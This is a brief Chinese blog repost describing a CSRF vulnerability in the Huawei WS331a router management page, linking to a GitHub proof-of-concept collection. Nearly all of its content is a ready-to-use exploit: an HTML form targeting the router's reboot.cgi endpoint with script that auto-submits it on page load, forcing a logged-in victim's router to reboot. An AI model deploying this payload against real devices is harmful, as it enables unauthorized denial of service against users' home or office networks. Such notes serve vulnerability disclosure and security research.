技术文章阅读-华为WS331a产品管理页面存在CSRF漏洞

https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/%E5%8D%8E%E4%B8%BAWS331a%E4%BA%A7%E5%93%81%E7%AE%A1%E7%90%86%E9%A1%B5%E9%9D%A2%E5%AD%98%E5%9C%A8CSRF%E6%BC%8F%E6%B4%9E.md

 

常规思路

<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

  

posted @ 2020-10-26 10:30  君莫笑hhhhhh  阅读(77)  评论(0编辑  收藏  举报